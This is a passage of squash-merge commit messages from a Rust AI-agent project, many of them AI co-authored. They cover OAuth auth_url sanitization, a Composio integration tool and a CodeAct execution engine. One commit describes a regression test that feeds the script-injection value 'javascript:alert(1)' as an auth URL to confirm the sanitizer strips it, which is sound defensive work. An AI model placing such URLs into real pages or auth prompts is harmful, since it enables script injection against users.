`http://`, and `data:` URLs from a buggy or compromised local
extension. The v1 dispatcher path already had a private
`sanitize_auth_url` helper from #2038; v2 was the asymmetry.

Promote `sanitize_auth_url` to `crate::auth::oauth` (its natural
home next to the rest of the shared OAuth runtime) as
`pub(crate)`, drop the private copy in `agent::dispatcher`, and
apply it at every v2 site that builds an `auth_url` from runtime
data:

- `effect_adapter::auth_gate_from_extension_result` (post-exec)
- `effect_adapter` `tool_install` post-readiness branch
- `effect_adapter` `check_action_auth` pre-flight gate
- `effect_adapter` `check_tool_readiness` pre-flight gate
- `auth_manager::check_tool_readiness` (extension `auth.auth_url()`)
- `auth_manager::execute_latent_extension_action`

Regression test drives `EffectBridgeAdapter::execute_action` with
a stub `OAuthPromptTool` returning `auth_url: "javascript:alert(1)"`
and asserts the resulting `ResumeKind::Authentication.auth_url`
is `None` — per the "Test Through the Caller, Not Just the Helper"
rule, since the helper-level test alone would not have caught the
v2 gap. A sibling test asserts that a well-formed `https://` URL
still flows through unchanged.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge): close remaining auth_url sanitization gaps (#2206)

Address two review comments on #2215:

- Copilot (auth_manager.rs:299): the fallback `described.auth_url`
  in `check_tool_readiness` ultimately flows from a skill manifest's
  `oauth.authorization_url` via `start_skill_oauth_if_supported` and
  was not sanitized. The issue scoped config-derived URLs as out of
  scope, but applying the sanitizer here is a one-line, zero-risk
  change that prevents the next refactor from quietly reintroducing
  the gap. Sanitize both branches before `.or_else()`.

- serrrfirat (effect_adapter.rs:598): the
  `LatentActionExecution::NeedsAuth` consumer in `execute_action`
  was the only one of the five `ResumeKind::Authentication`
  construction sites in this file that did not call
  `sanitize_auth_url`. The source (`auth_manager::execute_latent_extension_action`)
  already sanitizes, but the asymmetry made the consumer fragile to
  upstream changes. Apply the helper here too so all five sites
  share the same belt-and-suspenders pattern.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: add amazon tutorial

* chore: apply suggestions from code review

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
Co-authored-by: Guille <gagdiez.c@gmail.com>

* chore: apply suggestions from code review

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
Co-authored-by: Guille <gagdiez.c@gmail.com>

---------

Co-authored-by: Guille <gagdiez.c@gmail.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
* fix(oauth): use localhost for redirect URI when bound to 0.0.0.0

Google rejects redirect_uri=http://0.0.0.0:<port>/oauth/callback as
invalid. When no tunnel public_url is configured, the gateway base URL
was built directly from GATEWAY_HOST, which is a bind address — not a
routable hostname. Map unspecified addresses (0.0.0.0, ::, [::]) to
localhost, matching the social-login flow's existing fallback.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(oauth): use IpAddr::is_unspecified for robust wildcard detection

Address PR feedback: replace string matching with std::net::IpAddr
parsing so all representations of unspecified addresses (including
0:0:0:0:0:0:0:0) are caught. Add regression tests.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use is_ok_and instead of map_or(false, ..) to satisfy clippy

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: add Composio WASM tool for third-party app integrations

Add Composio integration as a WASM tool (tools-src/composio/), providing
a single multiplexed tool with 4 actions: list, execute, connect, and
connected_accounts. Supports 250+ third-party apps via Composio's REST
API with WASM sandbox security (fuel metering, memory limits, network
allowlisting, host-injected credentials).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address review — retry safety, dead code, registry manifest

Code fixes (tools-src/composio/src/lib.rs):
- Only retry GET requests (idempotent); POST executes once to prevent
  duplicate side effects on execute/connect actions
- Remove dead parse_json_response status check (already handled by
  caller); use serde_json::from_slice to avoid extra allocation
- Remove misleading secret_exists pre-flight (only checks capability
  allowlist, not actual presence); instead surface helpful error on
  401/403 from the API
- Extract entity_id logic into extract_entity_id() helper with 6 unit
  tests covering precedence chain and edge cases

Registry:
- Add registry/tools/composio.json manifest (matches format of other
  tools like web-search, github, gmail)
- Add composio to the default bundle in _bundles.json

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: restore secret pre-flight, enforce schema, remove default tag

- Restore secret_exists pre-flight as best-effort check (avoids wasting
  rate-limited API calls when clearly misconfigured)
- Add #[serde(deny_unknown_fields)] to Params to match the schema's
  additionalProperties: false contract
- Remove "default" tag from registry manifest and remove from default
  bundle until WASM artifacts are published

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: simplify entity_id fallback, add params type to schema

- Remove requester_id fallback from extract_entity_id (user_id is
  always present in JobContext, so requester_id was dead code)
- Add "type": "object" to params field in both tool schema and
  capabilities.json to prevent schema-driven callers from sending
  non-object values

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: align with Composio v3 API contract + fixture tests

Address serrrfirat's review — update all response parsing and request
fields to match the current Composio v3 API:

- Add unwrap_items() helper for paginated { "items": [...] } envelopes,
  with bare-array fallback for backward compatibility
- connect_app: parse auth_configs from paginated response via
  extract_auth_config_id()
- execute_action: use v3 fields `user_id` + `arguments` (not deprecated
  `entity_id` + `input`)
- list_accounts/resolve_account: use plural query params `user_ids`,
  `toolkit_slugs` (v3 contract)
- lookup_app_for_tool: look for nested `toolkit.slug` (v3), falling
  back to `toolkit_slug` and `appName`
- find_active_account: sort by `updated_at` (v3), falling back to
  `updatedAt`

Add 15 fixture-style tests covering:
- Paginated envelope parsing (envelope, bare array, empty, non-array)
- Auth config extraction (paginated, bare, empty)
- Toolkit slug extraction (v3 nested, legacy flat, appName fallback,
  case-insensitive, not-found)
- Active account selection (v3 timestamps, legacy timestamps, no active)

Total: 25 tests (5 URL, 5 entity_id, 15 v3 contract fixtures)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address PR review — remove duplicate parameters, validate params, fix ordering

- Remove `parameters` section from capabilities JSON (duplicates SCHEMA const,
  runtime ignores it, creates drift risk)
- Fix Cargo.toml exclude ordering: tools-src/composio before tools-src/github
- Validate `params` is a JSON object when provided, reject non-object values early
- Remove 429 from retry logic (WASM has no sleep/backoff, immediate retry wastes
  rate-limit budget) — only retry on transient 5xx
- Add tests for params validation

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address maintainer review — retry convention, numeric IDs, slug validation

- Revert 429 retry to align with github/web-search tool convention (sub-second
  sliding-window resets can make immediate retries worthwhile)
- Handle numeric entity_id/user_id in context JSON (as_u64/as_i64 fallback)
- Add validate_tool_slug() defense-in-depth against path traversal (same
  pattern as github tool)
- Add tests for numeric entity IDs and slug validation (32 total)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address 4 unresolved audit issues — pagination, direct lookup, array params

1. list_tools: expose cursor/limit params in schema, preserve next_cursor
   and total in response for multi-page browsing, add toolkit_versions=latest
2. lookup_app_for_tool: use direct GET /tools/{slug} endpoint instead of
   fuzzy search (avoids false negatives from search pagination/ranking),
   add toolkit_versions=latest
3. connected_accounts queries: encode user_ids and toolkit_slugs as array
   params (user_ids[], toolkit_slugs[]) per v3 API contract
4. toolkit_versions=latest added to both list and lookup endpoints

Adds 5 new tests (37 total): cursor/limit params, array query encoding,
direct tool response parsing (v3 nested, legacy, missing).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: ilblackdragon@gmail.com <ilblackdragon@gmail.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: firat.sertgoz <f@nuff.tech>
…stant (#1736)

* v2 architecture phase 1

* feat(engine): Phase 2 — execution loop, capability system, thread runtime

Add the core execution engine to ironclaw_engine crate:

- CapabilityRegistry: register/get/list capabilities and actions
- LeaseManager: async lease lifecycle (grant, check, consume, revoke, expire)
- PolicyEngine: deterministic effect-level allow/deny/approve
- ThreadTree: parent-child relationship tracking
- ThreadSignal/ThreadOutcome: inter-thread messaging via mpsc
- ThreadManager: spawn threads as tokio tasks, stop, inject messages, join
- ExecutionLoop: core loop replacing run_agentic_loop() with signals,
  context building, LLM calls, action execution, and event recording
- Structured executor (Tier 0): lease lookup → policy check → effect execution
- Tool intent nudge detection
- MemoryStore + RetrievalEngine stubs for Phase 4
- Full 8-phase architecture plan in docs/plans/
- CLAUDE.md spec for the engine crate

74 tests passing, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): Phase 3 — Monty Python executor with RLM pattern

Add CodeAct execution (Tier 1) using the Monty embedded Python
interpreter, following the Recursive Language Model (RLM) pattern
from arXiv:2512.24601.

Key additions:
- executor/scripting.rs: Monty integration with FunctionCall-based
  tool dispatch, catch_unwind panic safety, resource limits (30s,
  64MB, 1M allocs)
- LlmResponse::Code variant + ExecutionTier::Scripting
- Context-as-variables (RLM 3.4): thread messages, goal, step_number,
  previous_results injected as Python variables — LLM context stays
  lean while code accesses data selectively
- llm_query(prompt, context) (RLM 3.5): recursive subagent calls
  from within Python code — results stored as variables, not injected
  into parent's attention window (symbolic composition)
- Compact output metadata between code steps instead of full stdout
- MontyObject ↔ serde_json::Value bidirectional conversion
- Updated architecture plan with RLM design principles

74 tests passing, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): RLM best-practices enhancements from cross-reference analysis

Cross-referenced our implementation against the official RLM (alexzhang13/rlm),
fast-rlm (avbiswas/fast-rlm), and Prime Intellect's verifiers implementation.
Key enhancements:

- FINAL(answer) / FINAL_VAR(name): explicit termination pattern matching
  all three reference implementations. Code can signal completion at any
  point, not just via return value.
- llm_query_batched(prompts): parallel recursive sub-calls via tokio::spawn,
  matching fast-rlm's asyncio.gather pattern and Prime Intellect's llm_batch.
- Output truncation increased to 8000 chars (from 120), matching Prime
  Intellect's 8192 default. Shows [TRUNCATED: last N chars] or [FULL OUTPUT].
- Step 0 orientation preamble: auto-injects context metadata (message count,
  total chars, goal, last user message preview) before first code step,
  matching fast-rlm's auto-print pattern.
- Error-to-LLM flow: Python parse errors, runtime errors, NameErrors,
  OS errors, and async errors now flow back as stdout content instead of
  terminating the step, enabling LLM self-correction on next iteration.
  Only VM panics (catch_unwind) terminate as EngineError.

74 tests passing, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs(engine): update architecture plan with RLM cross-reference learnings

Comprehensive update after cross-referencing against official RLM
(alexzhang13/rlm), fast-rlm (avbiswas/fast-rlm), Prime Intellect
(verifiers/RLMEnv), rlm-rs (zircote/rlm-rs), and Google ADK RLM.

Changes:
- Mark Phases 1-3 as DONE with commit refs and test counts
- Add "Key Influences" section documenting all reference implementations
- Phase 3: full table of implemented RLM features with sources
- Phase 3: "Remaining gaps" table with which phase addresses each
- Phase 4: expanded with compaction (85% context), rlm_query() (full
  recursive sub-agent), dual model routing, budget controls (USD,
  timeout, tokens, consecutive errors), lazy loading, pass-by-reference
- Add "RLM Execution Model" cross-cutting section
- Add "Implementation Progress" tracking table
- Remove stale "TO IMPLEMENT" markers (all Phase 3 work is done)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): Phase 4 — budget controls, compaction, reflection pipeline

Budget enforcement in ExecutionLoop:
- max_tokens_total: cumulative token limit, checked before each iteration
- max_duration: wall-clock timeout for entire thread
- max_consecutive_errors: consecutive error steps threshold (resets on
  success, matching official RLM behavior)
- All produce ThreadOutcome::Failed with descriptive messages

Context compaction (from RLM paper, 85% threshold):
- estimate_tokens(): char-based estimation (chars/4, matching RLM)
- should_compact(): triggers when tokens >= threshold_pct * context_limit
- compact_messages(): asks LLM to summarize progress, replaces history
  with [system, summary, continuation_note], preserves intermediate results
- Configurable via ThreadConfig: model_context_limit, compaction_threshold

Dual model routing:
- LlmCallConfig gains depth field (0=root, 1+=sub-call)
- Implementations can route to cheaper models for sub-calls
- ExecutionLoop passes thread depth to every LLM call

Reflection pipeline (reflection/pipeline.rs):
- reflect(thread, llm): analyzes completed thread via LLM
- Produces Summary doc (always), Lesson doc (if errors), Issue doc (if failed)
- Builds transcript from thread messages + error events
- Returns ReflectionResult with docs + token usage

ThreadConfig extended with: max_tokens_total, max_consecutive_errors,
model_context_limit, enable_compaction, compaction_threshold, depth, max_depth.

78 tests passing, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): Phase 5 — conversation surface separated from execution

Conversation is now a UI layer, not an execution boundary. Multiple
threads can run concurrently within one conversation; threads can
outlive their originating conversation.

New types (types/conversation.rs):
- ConversationSurface: channel + user + entries + active_threads
- ConversationEntry: sender (User/Agent/System) + content + origin_thread_id
- ConversationId, EntryId (UUID newtypes)
- EntrySender enum (User, Agent{thread_id}, System)

ConversationManager (runtime/conversation.rs):
- get_or_create_conversation(channel, user) — indexed by (channel, user)
- handle_user_message() — injects into active foreground thread or spawns new
- record_thread_outcome() — adds agent/system entries, untracks completed threads
- get_conversation(), list_conversations()

This enables the key architectural insight: a user can ask "what's the
weather?" while a deployment thread is still running. Both produce entries
in the same conversation.

85 tests passing, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs(engine): simplify execution tiers — Monty-only for CodeAct/RLM

Restructure phases 6-8 to clarify execution model:

- Monty is the sole Python executor for CodeAct/RLM. No WASM or Docker
  Python runtimes for LLM-generated code.
- WASM sandbox is for third-party tool isolation (existing infra, Phase 8)
- Docker containers are for thread-level isolation of high-risk work (Phase 8)
- Two-phase commit moves to Phase 6 (integration) at the adapter boundary

Phase renumbering:
- Old Phase 6 (Tier 2-3) → removed as separate phase
- Old Phase 7 (integration) → Phase 6
- Old Phase 8 (cleanup) → Phase 7
- New Phase 8: WASM tools + Docker thread isolation (infra integration)

Updated progress table: Phases 1-5 marked DONE with test counts and commits.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): Phase 6 — bridge adapters for main crate integration

Strategy C parallel deployment: when ENGINE_V2=true env var is set,
user messages route through the engine instead of the existing agentic
loop. All existing behavior is unchanged when the flag is off.

Bridge module (src/bridge/):
- LlmBridgeAdapter: wraps LlmProvider as engine LlmBackend, converts
  ThreadMessage↔ChatMessage, ActionDef↔ToolDefinition, depth-based
  model routing (primary vs cheap_llm)
- EffectBridgeAdapter: wraps ToolRegistry+SafetyLayer as EffectExecutor,
  routes tool calls through existing execute_tool_with_safety pipeline
- InMemoryStore: HashMap-backed Store impl (no DB tables needed yet)
- EngineRouter: is_engine_v2_enabled() + handle_with_engine() that
  builds engine from Agent deps and processes messages end-to-end

Integration touchpoint (4 lines in agent_loop.rs):
  After hook processing, before session resolution, check ENGINE_V2
  flag and route UserInput through the engine path.

Accessor visibility widened: llm(), cheap_llm(), safety(), tools()
changed from pub(super) to pub(crate) for bridge access.

85 engine tests + main crate clippy clean.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): add user message and system prompt to thread before execution

The ExecutionLoop was sending empty messages to the LLM because the
thread was spawned with the user's input as the goal but no messages.

Fixes:
- ThreadManager.spawn_thread() now adds the goal as an initial user
  message before starting the execution loop
- ExecutionLoop.run() injects a default system prompt if none exists

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge): match existing LLM request format to prevent 400 errors

The LLM bridge was missing several defaults that the existing
Reasoning.respond_with_tools() sets:

- tool_choice: "auto" when tools are present (required by some providers)
- max_tokens: 4096 (default)
- temperature: 0.7 (default)
- When no tools (force_text): use plain complete() instead of
  complete_with_tools() with empty tools array — matches existing
  no-tools fallback path

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): persist conversation context across messages

The engine was creating a fresh ThreadManager and InMemoryStore per
message, losing all context between turns. A follow-up question like
"what are the latest 10 issues?" had no memory of the prior "how many
issues" response.

Fixes:
- EngineState (ThreadManager, ConversationManager, InMemoryStore) now
  persists across messages via OnceLock, initialized on first use
- ConversationManager builds message history from prior conversation
  entries (user messages + agent responses) and passes it to new threads
- ThreadManager.spawn_thread_with_history() accepts initial_messages
  that are prepended before the current user message
- System notifications (thread started/completed) are filtered out of
  the history (not useful as LLM context)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): enable CodeAct/RLM mode with code block detection

The engine now operates in CodeAct/RLM mode:

System prompt (executor/prompt.rs):
- Instructs LLM to write Python in ```repl fenced blocks
- Documents available tools as callable Python functions
- Documents llm_query(), llm_query_batched(), FINAL()
- Documents context variables (context, goal, step_number, previous_results)
- Strategy guidance: examine context, break into steps, use tools, call FINAL()

Code block detection (bridge/llm_adapter.rs):
- extract_code_block() scans LLM text responses for ```repl or ```python blocks
- When detected, returns LlmResponse::Code instead of LlmResponse::Text
- The ExecutionLoop routes Code responses through Monty for execution

No structured tool definitions sent to LLM:
- Tools are described in the system prompt as Python functions
- The LLM call sends empty actions array, forcing text-mode responses
- This ensures the LLM writes code blocks (CodeAct) instead of
  structured tool calls (which would bypass the REPL)

85 tests passing, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(engine): add 8 CodeAct/RLM E2E tests with mock LLM

Comprehensive test coverage for the Monty Python execution path:

- codeact_simple_final: Python code calls FINAL('answer') → thread completes
- codeact_tool_call_then_final: code calls test_tool() → FunctionCall
  suspends VM → MockEffects returns result → code resumes → FINAL()
- codeact_pure_python_computation: sum([1,2,3,4,5]) → FINAL('Sum is 15')
  with no tool calls — pure Python in Monty
- codeact_multi_step: first step prints output (no FINAL), second step
  sees output metadata and calls FINAL — tests iterative REPL flow
- codeact_error_recovery: first step has NameError → error flows to LLM
  as stdout → second step recovers with FINAL — tests error transparency
- codeact_context_variables_available: code accesses `goal` and `context`
  variables injected by the RLM context builder
- codeact_multiple_tool_calls_in_loop: for loop calls test_tool() 3 times
  → 3 FunctionCall suspensions → all results collected → FINAL
- codeact_llm_query_recursive: code calls llm_query('prompt') → VM
  suspends → MockLlm provides sub-agent response → result returned as
  Python string variable

93 tests passing (85 prior + 8 new), zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge): detect code blocks in plain completion path + multi-block support

Two bugs fixed:

1. The no-tools completion path (used by CodeAct since we send empty
   actions) returned LlmResponse::Text without checking for code blocks.
   Code blocks were rendered as markdown text instead of being executed.

2. extract_code_block now:
   - Handles bare ``` fences (skips non-Python languages)
   - Collects ALL code blocks in the response and concatenates them
     (models often split code across multiple blocks with explanation)
   - Tries markers in order: ```repl, ```python, ```py, then bare ```

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(bridge): add 11 regression tests for code block extraction

Covers the exact failure modes discovered during live testing:

- extract_repl_block: standard ```repl fenced block
- extract_python_block: ```python marker
- extract_py_block: ```py shorthand
- extract_bare_backtick_block: bare ``` with Python content
- skip_non_python_language: ```json should NOT be extracted
- no_code_blocks_returns_none: plain text, no fences
- multiple_code_blocks_concatenated: two ```repl blocks with
  explanation between them → concatenated with \n\n
- mixed_thinking_and_code: model outputs explanation + two
  ```python blocks (the Hyperliquid case) → both extracted
- repl_preferred_over_bare: ```repl takes priority over bare ```
- empty_code_block_skipped: empty fenced block returns None
- unclosed_block_returns_none: no closing ``` returns None

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): detect FINAL() in text responses + regression tests

Models sometimes write FINAL() outside code blocks — as plain text
after an explanation. The Hyperliquid case: model outputs a long
analysis then FINAL("""...""") at the end, not inside ```repl fences.

Fixes:
- extract_final_from_text(): regex-based FINAL detection in text
  responses, matching the official RLM's find_final_answer() fallback
- Handles: double-quoted, single-quoted, triple-quoted, unquoted,
  nested parens
- Checked in LlmResponse::Text handler BEFORE tool intent nudge
  (FINAL takes priority)

9 new tests:
- codeact_final_in_text_response: FINAL("answer") in plain text
- codeact_final_triple_quoted_in_text: FINAL("""multi\nline""") in text
- final_double_quoted, final_single_quoted, final_triple_quoted,
  final_unquoted, final_with_nested_parens, final_after_long_text,
  no_final_returns_none

102 tests passing (93 + 9 new), zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs: add crate extraction & cleanup roadmap

Documents architectural recommendations from the engine v2 design
process for future reference:

- Root directory consolidation (channels-src + tools-src → extensions/)
- Crate extraction tiers: zero-coupling (estimation, observability,
  tunnel), trivial-coupling (document_extraction, pairing, hooks),
  medium-coupling (secrets, MCP, db, workspace, llm, skills),
  heavy-coupling (web gateway, agent, extensions)
- src/ module reorganization into logical groups (core, persistence,
  infra, media, support)
- main.rs/app.rs slimming targets (100/500 lines after migration)
- WASM module candidates (document_extraction) and non-candidates
  (REPL, web gateway → separate crates instead)
- Priority ordering for extraction work
- Tracks completed items (ironclaw_safety, ironclaw_engine,
  transcription move)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): live progress status updates via event broadcast

Engine v2 now shows live progress in the CLI (and any channel):
- "Thinking..." when a step starts
- Tool name + success/error when actions execute
- "Processing results..." when a step completes

Implementation:
- ThreadManager holds a broadcast::Sender<ThreadEvent> (capacity 256)
- ExecutionLoop.emit_event() writes to thread.events AND broadcasts
- ThreadManager.subscribe_events() returns a receiver
- Router uses tokio::select! to listen for events while waiting for
  thread completion, forwarding them as StatusUpdate to the channel

This replaces the polling approach with zero-latency event streaming.
Agent.channels visibility widened to pub(crate) for bridge access.

102 tests passing, zero clippy warnings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): include tool results in code step output for LLM context

The LLM was ignoring tool results and answering from training data
because the compact output metadata didn't include what tools returned.
Tool results lived only as ActionResult messages (role: Tool) which
some providers flatten or the model ignores.

Now the code step output includes:
- stdout from Python print() statements
- [tool_name result] with the actual output (truncated to 4K per tool)
- [tool_name error] for failed tools
- [return] for the code's return value
- Total output truncated to 8K chars to prevent context bloat

This ensures the model sees web_search results, API responses, etc.
in the next iteration and can reason about them instead of hallucinating.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): add debug/trace logging for CodeAct execution

Three verbosity levels for debugging the engine:

RUST_LOG=ironclaw_engine=debug:
- LLM call: message count, iteration, force_text
- LLM response: type (text/code/action_calls), token usage
- Code execution: code length, action count, had_error, final_answer
- Text response: length, FINAL() detection

RUST_LOG=ironclaw_engine=trace:
- Full message list sent to LLM (role, length, first 200 chars each)
- Full code block being executed
- stdout preview (first 500 chars)
- Per-tool results (name, success, first 300 chars of output)
- Text response preview (first 500 chars)

Usage:
  ENGINE_V2=true RUST_LOG=ironclaw_engine=debug cargo run
  ENGINE_V2=true RUST_LOG=ironclaw_engine=trace cargo run

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): execution trace recording + retrospective analysis

Enable with ENGINE_V2_TRACE=1 to get full execution traces and
automatic issue detection after each thread completes.

Trace recording (executor/trace.rs):
- build_trace(): captures full thread state — messages (with full
  content), events, step count, token usage, detected issues
- write_trace(): writes JSON to engine_trace_{timestamp}.json
- log_trace_summary(): logs summary + issues at info/warn level

Retrospective analyzer detects 8 issue categories:
- thread_failure: thread ended in Failed state
- no_response: no assistant message generated
- tool_error: specific tool failures with error details
- code_error: Python errors (NameError, SyntaxError, etc.) in output
- missing_tool_output: tool results exist but not in system messages
- excessive_steps: >10 steps (may be stuck in loop)
- no_tools_used: single-step answer without tools (hallucination risk)
- mixed_mode: text responses without code blocks (prompt not followed)

Thread state now saved to store after execution completes (for trace
access after join_thread).

Usage:
  ENGINE_V2=true ENGINE_V2_TRACE=1 cargo run
  # After each message: trace JSON + issue log in terminal

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): wire reflection pipeline + trace analysis into thread lifecycle

After every thread completes, ThreadManager now automatically runs:

1. Retrospective trace analysis (non-LLM, always):
   - Detects 8 issue categories (tool errors, code errors, missing
     outputs, excessive steps, hallucination risk, etc.)
   - Logs issues at warn level when found

2. Trace file recording (when ENGINE_V2_TRACE=1):
   - Writes full JSON trace to engine_trace_{timestamp}.json

3. LLM reflection (when enable_reflection=true):
   - Calls reflection pipeline to produce Summary, Lesson, Issue docs
   - Saves docs to store for future context retrieval
   - Enabled by default in the bridge router

All three run inside the spawned tokio task after exec.run() completes,
before saving the final thread state. No external wiring needed.

Removed duplicate trace recording from the router — it's now handled
by ThreadManager automatically.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge): convert tool name hyphens to underscores for Python compatibility

Root cause from trace analysis: the LLM writes `web_search()` (valid
Python identifier) but the tool registry has `web-search` (with hyphen).
The EffectBridgeAdapter couldn't find the tool → "Tool not found" error
→ model fabricated fake data instead.

Fixes:
- available_actions(): converts tool names from hyphens to underscores
  (web-search → web_search) so the system prompt lists valid Python names
- execute_action(): tries the original name first, then falls back to
  hyphenated form (web_search → web-search) for tool registry lookup
- Same conversion in router's capability registry builder

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge): parse JSON tool output to prevent double-serialization

From trace analysis: web_search returned a JSON string, which was
wrapped as serde_json::json!(string) creating a Value::String containing
JSON. When Monty got this as MontyObject::String, the Python code
couldn't index it with result['title'] → TypeError.

Fix: try parsing the tool output string as JSON first. If valid, use the
parsed Value (becomes a Python dict/list). If not valid JSON, keep as
string. This means web_search results are directly indexable in Python:
  results = web_search(query="...")
  print(results["results"][0]["title"])  # works now

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(engine): persist variables across code steps via `state` dict

Monty creates a fresh runtime per code step, so variables are lost
between steps. This caused the model to re-paste tool results from
system messages, wasting tokens.

Fix: maintain a `persisted_state` JSON dict in the ExecutionLoop that
accumulates across steps:
- Tool results stored by tool name: state["web_search"] = {results...}
- Return values stored: state["last_return"], state["step_0_return"]
- Injected as a `state` Python variable in each new MontyRun

Now the model can do:
  Step 1: results = web_search(query="...")  # tool result saved in state
  Step 2: data = state["web_search"]         # access previous result
          summary = llm_query("summarize", str(data))
          FINAL(summary)

System prompt updated to document the `state` variable.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): add state hint on code errors + retrieval engine integration

When code fails with NameError/UnboundLocalError (model trying to
access variables from a previous step), the error output now includes:

  [HINT] Variables don't persist between code blocks. Use the `state`
  dict to access data from previous steps. Available keys: ["web_search",
  "last_return"]

This teaches the model to use `state["web_search"]` instead of `result`
after a NameError, reducing wasted steps from 3-4 to 1.

Also integrates RetrievalEngine into context building and ThreadManager:
- build_step_context() now accepts optional RetrievalEngine to inject
  relevant memory docs (Lessons, Specs, Playbooks) into LLM context
- RetrievalEngine uses keyword matching with doc-type priority scoring
- Memory docs from reflection (Phase 4) now feed back into future threads

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* chore: remove trace files and add to .gitignore

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): replace web_fetch example with web_search in CodeAct prompt

The system prompt example used web_fetch(url="...") which doesn't exist
as a tool. The model learned from the example and tried web_fetch,
getting "Tool not found". Changed to web_search(query="...") which is
an actual registered tool.

Found via trace analysis — reflection pipeline correctly identified
this as a "Tool Name Correction" spec doc.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor(engine): extract prompt templates to markdown files

Prompt templates moved from inline Rust strings to plain markdown files
at crates/ironclaw_engine/prompts/ for easy inspection and iteration:

- prompts/codeact_preamble.md — main instructions, special functions,
  context variables, rules
- prompts/codeact_postamble.md — strategy section

Loaded at compile time via include_str!(), so no runtime file I/O.
Edit the .md files and rebuild to iterate on prompts.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): replace byte-index slicing with char-safe truncation

Panic: 'byte index 80 is not a char boundary; it is inside ''' when
tool output contained multi-byte UTF-8 characters (smart quotes from
web search results).

Fixed 4 unsafe byte-index slices:
- thread.rs:281: message preview &content[..80] → chars().take(80)
- loop_engine.rs:556: tool output &str[..4000] → chars().take(4000)
- loop_engine.rs:579: output tail &str[len-8000..] → chars().skip()
- scripting.rs:82: stdout tail &str[len-N..] → chars().skip()

All now use .chars().take() or .chars().skip() which respect character
boundaries. Follows CLAUDE.md rule: "Never use byte-index slicing on
user-supplied or external strings."

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): fix false positive missing_tool_output warning in trace analyzer

The check was looking for "[" + "result]" in System-role messages only,
but tool output metadata is added with patterns like "[shell result]"
and may appear in messages with any role. Changed to scan all messages
for " result]" or " error]" patterns regardless of role.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs(engine): update architecture plan with Phase 6 status and approval flow design

Phase 6 updated to reflect what was actually built:
- Bridge adapters (LLM, Effect, InMemoryStore, Router) — all done
- Integration touchpoint (4 lines in handle_message) — done
- Live progress via broadcast events — done
- Conversation persistence across messages — done
- Trace recording + retrospective analysis — done
- 8 bugs found and fixed via trace analysis — documented

Phase 6 remaining work documented:
- Approval flow: detailed 5-step design (send to channel, pause thread,
  route response, resume execution, always handling) with v1 reference
